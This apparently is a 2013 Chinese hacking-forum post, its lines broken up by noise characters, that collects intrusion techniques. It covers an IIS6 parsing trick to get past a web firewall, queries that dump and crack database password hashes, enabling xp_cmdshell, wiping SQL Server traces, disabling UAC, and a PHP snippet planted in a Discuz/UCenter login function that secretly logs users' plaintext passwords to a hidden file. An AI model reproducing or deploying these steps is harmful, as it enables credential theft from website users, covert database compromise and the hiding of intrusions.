; g6 S( M, z# c: f8 q( ^+ h利用II6文件解析漏洞绕过安全狗代码:
$ s0 c" w9 g* z$ U K: f* K3 Y/ s; s- u;antian365.asp;antian365.jpg- S+ ^6 o9 x, U) A" Y, h
) h# e6 A- K; ^# w/ M各种类型数据库抓HASH破解最高权限密码!
5 k1 x$ V; E' i2 y- }* ? k+ m1.sql server2000
/ e9 G; m7 T& Y% N$ iSELECT password from master.dbo.sysxlogins where name='sa'# q/ n2 B. e ~0 @' t
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
& {. o) C4 M9 \3 s3 B3 C6 k- N2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
# X2 s8 W. O! Q# o
; q5 h# J% P; D9 k0×0100- constant header0 ?" ~- {( p9 Q
34767D5C- salt
1 x; ]. K9 _# [9 {0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
5 T: i4 @; Z, k3 T: j0 C2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
# h( a$ G4 x3 y) ]% `4 ucrack the upper case hash in ‘cain and abel’ and then work the case sentive hash$ [3 i* o; E, U+ p3 I# y" b, K2 U
SQL server 2005:-/ h7 m2 E1 t1 s) Q$ b
SELECT password_hash FROM sys.sql_logins where name='sa'3 t1 ?2 A. U: ?+ o/ a7 Q6 {- C
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F7 x% u$ s! Q( ~, w$ R
0×0100- constant header
) i! o# B1 G$ n z" p* i$ \993BF231-salt
3 S+ ]8 o8 E( @$ q2 U8 L5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
- V% K6 q$ Z5 P2 K) p q* L# ^. lcrack case sensitive hash in cain, try brute force and dictionary based attacks.1 ^) N% `2 f @; @& L
: ]( d8 b- m' |- B% [5 w8 [
update:- following bernardo’s comments:-
' Q1 ~2 S8 J7 d, v9 {7 \# D# `use function fn_varbintohexstr() to cast password in a hex string.7 d. w0 \) O) [/ R+ Y
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins0 {2 ` W. o7 j; Y4 G- t: F# h4 N3 D
2 H7 f5 k! ]) `7 J0 i. m( G3 s& G8 w
MYSQL:-
0 O$ J. l ]" U; N& |* z
# R+ H0 Q/ T# z% @5 o& ~In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
; c5 a! c Z6 C, F R
: R5 j* z4 J( @. I9 c, F0 {1 G% P*mysql < 4.1: n1 ~* G" h( A2 E3 G) H4 J: ^
7 h8 @; g" `% k- i* ~" `
mysql> SELECT PASSWORD(‘mypass’);. Y: O& n2 T* p$ \8 Q5 T
+——————–+0 X/ w1 a" \) y/ f. k2 i7 r
| PASSWORD(‘mypass’) |
, ~7 R6 b* |0 X2 Y+——————–+
7 h" j2 u X; y| 6f8c114b58f2ce9e |
8 U% d4 {0 G; Y. ~, |+——————–+
8 s' r) k$ d7 R) A4 }% W3 S1 j( b. L
*mysql >=4.1$ j6 p* F+ \: }( x6 l/ f ]4 j
$ M4 {; a( N" \
mysql> SELECT PASSWORD(‘mypass’);
: w5 k8 v5 R& `5 E+——————————————-+( f- G9 |. N+ F; S& J/ {0 H
| PASSWORD(‘mypass’) |
* F: w: Y. U4 D9 ?) K+——————————————-+
0 @# F }' k5 D| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |" M+ t, j! m8 |3 p! j1 t
+——————————————-+
. [% y: ^: X, M+ j3 X, h H+ y' c+ I9 @+ x/ F/ b; I0 r/ `9 A) b
Select user, password from mysql.user# G- ]$ i+ a! P8 l# J* ]
The hashes can be cracked in ‘cain and abel’5 C/ [) h r# ?7 ]
" q. x% _7 u; Z* vPostgres:-
! `7 D0 I _7 {4 TPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
' y* u: e. l+ Y2 Oselect usename, passwd from pg_shadow;
6 ^6 U8 m) ~# _usename | passwd
: P9 \% a6 U! H$ a; ]——————+————————————-9 y* a4 e( N- s% o1 O1 H. l' E
testuser | md5fabb6d7172aadfda4753bf0507ed4396
( B& K& }8 @# quse mdcrack to crack these hashes:-/ W6 b- e6 }( o- r, u
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
2 J& v6 E7 S6 @8 n- [8 Z
0 |2 t& ]; T2 G2 H. _Oracle:-; p6 U( M. R1 w1 m p
select name, password, spare4 from sys.user$& ?7 D% F- m7 c- q
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
: Z! G. k9 [) r9 |$ }7 I4 M1 {More on Oracle later, i am a bit bored….% L d$ ]/ {% `" M& D% s
, q2 q( s' L% R+ T7 @! X1 ~
% i: E& ]4 @9 j# B
在sql server2005/2008中开启xp_cmdshell
% ~ a! o8 f( I1 M: A) P0 E0 y-- To allow advanced options to be changed.
( n' {9 I. x& i" AEXEC sp_configure 'show advanced options', 15 c% ^8 |; @9 _ M& s9 Z7 c
GO
% J8 m) Q- f2 d0 D3 z-- To update the currently configured value for advanced options.. w8 e) r+ h' D, W
RECONFIGURE
5 W6 p5 L3 C7 A2 p; hGO3 ]- N2 R0 D+ A9 D+ N
-- To enable the feature.
/ @( ?* J" _2 o$ Z3 D4 u$ \' L7 \EXEC sp_configure 'xp_cmdshell', 1
* e0 W& ~% y# a* ^GO' C% _0 p0 [% _) r5 h
-- To update the currently configured value for this feature.
0 r+ K/ N7 u0 X; QRECONFIGURE
" d+ m9 G7 }: e9 m8 @/ B. YGO9 K$ ]3 M% }0 I6 c& M6 k5 d
SQL 2008 server日志清除,在清楚前一定要备份。. ]6 D3 g3 ^$ }) _6 b6 y9 v5 E
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
2 _9 L G. w. A9 { A/ d, ?X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin5 f J$ R# ^! e' }8 N: D
, @/ s, L" c' \9 [# Y1 o' J" o
对于SQL Server 2008以前的版本:7 U/ f6 J$ s/ U! B; Q
SQL Server 2005:7 _' Z# ^0 p1 n- i) s8 M
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
; Z6 b& n, C7 Z0 a" w- o1 sSQL Server 2000:
- u/ H/ @+ c' S5 o清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
5 A2 r3 i6 j4 B# j4 E" b
, Z/ z6 E8 _6 i6 z# P7 H$ o本帖最后由 simeon 于 2013-1-3 09:51 编辑- b8 w% v) ]& r$ p
" ?7 O0 N' ~8 \$ s& }
2 Z! V2 l; `7 T6 k Y
windows 2008 文件权限修改9 V2 s, T _5 \! v a1 V* W
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx" L( i; t* K& J( o3 r- l
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
& Z1 e& O, V/ E% v/ T! w一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,$ h6 C4 B* E% o) t% i c
( r/ q$ Z# \! l6 Q% F) ~
Windows Registry Editor Version 5.00
( |+ _( u: Y% x, _1 o6 U+ i8 g1 r[HKEY_CLASSES_ROOT\*\shell\runas]
8 x/ N5 R& O* A1 _; a* W4 \@="管理员取得所有权"' R3 j, ^8 ~5 I
"NoWorkingDirectory"=""
2 J8 U( M* C* X$ L# ?( M1 U[HKEY_CLASSES_ROOT\*\shell\runas\command]9 M- q P5 a! s Y
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F". S" m3 X$ r; Z+ }2 X1 D! ~3 J8 c1 G
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# Y! W4 @8 t: T1 L6 I
[HKEY_CLASSES_ROOT\exefile\shell\runas2]/ w. R5 m) U2 j# u6 M
@="管理员取得所有权"5 N! p# D" C+ }5 s3 C- }9 B5 x
"NoWorkingDirectory"=""+ ?+ \& q' g9 B- n% g: g2 \
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]3 H$ p6 D2 _1 G$ \9 O
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"3 S2 y3 y5 w, I6 o
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"+ O# X9 z7 {' R. P2 e; q& F7 X( q
( ?- H$ v9 E( t! c, K9 M[HKEY_CLASSES_ROOT\Directory\shell\runas]# C* J, C9 z6 P% E6 J( I# {
@="管理员取得所有权"
5 ?+ y( l3 Q: S/ I' ~& u"NoWorkingDirectory"=""
3 g; t# w4 }! ?- I5 N0 d* R[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
' T( w4 U; i$ z; Q! g: V@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"' i2 L* e3 Q# q2 Z
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"1 n. m. Y- l2 A& O- G/ g1 h
U$ U. H& s: H$ l( w
x1 s; S Z9 C
win7右键“管理员取得所有权”.reg导入
' C( V3 Q6 I+ B0 S0 e; W二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,. D5 }2 ^- T- u. I, u n0 O
1、C:\Windows这个路径的“notepad.exe”不需要替换
0 F x/ P4 P5 V) ?) w2、C:\Windows\System32这个路径的“notepad.exe”不需要替换3 f# J7 _, U5 N# ?
3、四个“notepad.exe.mui”不要管
5 T# g u: }/ J/ m4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和) v% a, x* u! _) E( Q% W
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
- G- d! [( B, Q, W# P$ e替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
. ?. U h% _; B替换完之后回到桌面,新建一个txt文档打开看看是不是变了。- P0 u7 b+ y) t6 v6 u
windows 2008中关闭安全策略:
4 w+ u; W$ l1 ]1 ]' ]reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f# x: z1 I, G* G
修改uc_client目录下的client.php 在" @5 S% |: w: z3 c0 ~, x: ?% j
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
1 y4 \0 }. p) R( u. F) ]下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
- D* T% A9 l4 u/ j) u你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw1 @, j% b6 z; E( \. X: w9 e% O% T4 B
if(getenv('HTTP_CLIENT_IP')) {
3 l# C: r y* i9 P' o$onlineip = getenv('HTTP_CLIENT_IP');: E# `3 f, ~" }- m
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
/ O) W8 s! _& B$onlineip = getenv('HTTP_X_FORWARDED_FOR');
( d7 L( z& _: E' W7 z} elseif(getenv('REMOTE_ADDR')) {
' c& V) V' O4 Y# D* _5 ]$onlineip = getenv('REMOTE_ADDR');
7 `# F" A; t9 E j- S$ S7 Y} else {
+ N8 E5 K1 a1 F- c$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
( K$ @5 z1 m1 ?7 R0 O, {8 T}
7 D4 C, |4 j: e+ Z2 @& ?) B $showtime=date("Y-m-d H:i:s");
1 t+ [, A$ ]$ r, }8 J9 j $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
7 B! [% ~0 | ` [6 \ $handle=fopen('./data/cache/csslog.php','a+');
. B# W5 d: ^$ n' t$ W $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对